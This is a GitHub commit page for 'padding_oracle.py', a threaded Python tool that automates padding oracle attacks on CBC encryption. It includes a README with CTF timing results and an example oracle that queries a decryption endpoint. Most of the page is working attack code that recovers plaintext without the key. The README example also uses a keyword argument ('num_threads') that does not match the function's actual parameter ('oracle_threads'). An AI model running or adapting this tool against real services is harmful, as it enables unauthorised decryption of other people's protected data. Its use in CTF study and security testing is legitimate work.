Skip to content

Commit 039812d

Browse files
committed
Initial commit
0 parents  commit 039812d

File tree

2 files changed

+157
-0
lines changed

2 files changed

+157
-0
lines changed

README.md

Lines changed: 46 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,46 @@
1+
# padding_oracle.py
2+
3+
Extremely fast threaded [padding oracle](http://server.maojui.me/Crypto/Padding_oracle_attack/) automation script for Python >= 3.7.
4+
5+
## Performance
6+
7+
Tested on [0x09] Cathub Party from EDU-CTF:
8+
9+
| Request Threads | Execution Time |
10+
|-----------------|----------------|
11+
| 1 | 17m 43s |
12+
| 4 | 5m 23s |
13+
| 16 | 1m 20s |
14+
| 64 | 56s |
15+
16+
## Example
17+
18+
All you need is defining the **oracle function** to check whether the given cipher is correctly decrypted.
19+
20+
```python
21+
#!/usr/bin/env python3
22+
23+
import time, requests
24+
from padding_oracle import * # also provide url encoding and base64 functions
25+
26+
sess = requests.Session()
27+
28+
cipher = b'[______IV______][____Cipher____]' # decrypted plain text will be 16 bytes
29+
block_size = 16
30+
31+
@padding_oracle(cipher, block_size, num_threads=64)
32+
def oracle(cipher): # return True if the cipher can be correctly decrypted
33+
while True:
34+
try:
35+
text = sess.get('https://example.com/decrypt',
36+
params={'cipher': base64_encode(cipher)}).text
37+
assert 'YES' in text or 'NO' in text # check if the request failed
38+
break
39+
except:
40+
print('[!] request failed')
41+
time.sleep(1)
42+
continue
43+
return 'YES' in text
44+
45+
print(oracle) # b'FLAG{XXXXXXXX}\x02\x02'
46+
```

padding_oracle.py

Lines changed: 111 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,111 @@
1+
import threading
2+
import types, typing
3+
import urllib.parse, base64
4+
5+
from concurrent.futures import ThreadPoolExecutor
6+
7+
8+
def base64_decode(s):
9+
return base64.b64decode(s.encode())
10+
11+
def base64_encode(b):
12+
return base64.b64encode(b).decode()
13+
14+
def urlencode(b):
15+
return urllib.parse.quote(b)
16+
17+
def urldecode(b):
18+
return urllib.parse.unquote_plus(b)
19+
20+
21+
def padding_oracle(cipher, block_size, oracle_threads=1, verbose=True):
22+
def _execute(oracle):
23+
24+
assert oracle is not None, \
25+
'the oracle function is not implemented'
26+
assert callable(oracle), \
27+
'the oracle function should be callable'
28+
assert oracle.__code__.co_argcount == 1, \
29+
'expect oracle function with only 1 argument'
30+
assert len(cipher) % block_size == 0, \
31+
'cipher length should be multiple of block size'
32+
33+
lock = threading.Lock()
34+
oracle_executor = ThreadPoolExecutor(max_workers=oracle_threads)
35+
plaintext = [b' '] * (len(cipher) - block_size)
36+
37+
def _update_plaintext(i: int, c: bytes):
38+
lock.acquire()
39+
plaintext[i] = c
40+
if verbose:
41+
print('[decrypted]', b''.join(plaintext))
42+
lock.release()
43+
44+
def _block_decrypt_task(i, prev_block: bytes, block: bytes):
45+
# if verbose:
46+
# print('block[{}]: {}'.format(i, block))
47+
48+
guess_list = list(prev_block)
49+
50+
for j in range(1, block_size + 1):
51+
oracle_hits = []
52+
oracle_futures = {}
53+
54+
for k in range(256):
55+
# ensure the last padding byte is changed (or it will)
56+
if i == len(blocks) - 1 and j == 1 and k == prev_block[-j]:
57+
continue
58+
59+
test_list = guess_list.copy()
60+
test_list[-j] = k
61+
oracle_futures[k] = oracle_executor.submit(
62+
oracle, bytes(test_list) + block)
63+
64+
# if verbose:
65+
# print('+', end='', flush=True)
66+
67+
for k, future in oracle_futures.items():
68+
if future.result():
69+
oracle_hits.append(k)
70+
if verbose:
71+
print('=> hits(block={}, pos=-{}):'.format(i, j), oracle_hits)
72+
73+
if len(oracle_hits) != 1:
74+
if verbose:
75+
print('[!] number of hits is not 1. (skipping this block)')
76+
return
77+
78+
guess_list[-j] = oracle_hits[0]
79+
80+
p = guess_list[-j] ^ j ^ prev_block[-j]
81+
_update_plaintext(i * block_size - j, bytes([p]))
82+
83+
for n in range(j):
84+
guess_list[-n-1] ^= j
85+
guess_list[-n-1] ^= j + 1
86+
87+
blocks = []
88+
89+
for i in range(0, len(cipher), block_size):
90+
j = i + block_size
91+
blocks.append(cipher[i:j])
92+
93+
if verbose:
94+
print('blocks: {}'.format(blocks))
95+
96+
with ThreadPoolExecutor() as executor:
97+
futures = []
98+
for i in reversed(range(1, len(blocks))):
99+
prev_block = b''.join(blocks[:i])
100+
block = b''.join(blocks[i:i+1])
101+
futures.append(
102+
executor.submit(
103+
_block_decrypt_task, i, prev_block, block))
104+
for future in futures:
105+
future.result()
106+
107+
oracle_executor.shutdown()
108+
109+
return b''.join(plaintext)
110+
111+
return _execute

0 commit comments

Comments
 (0)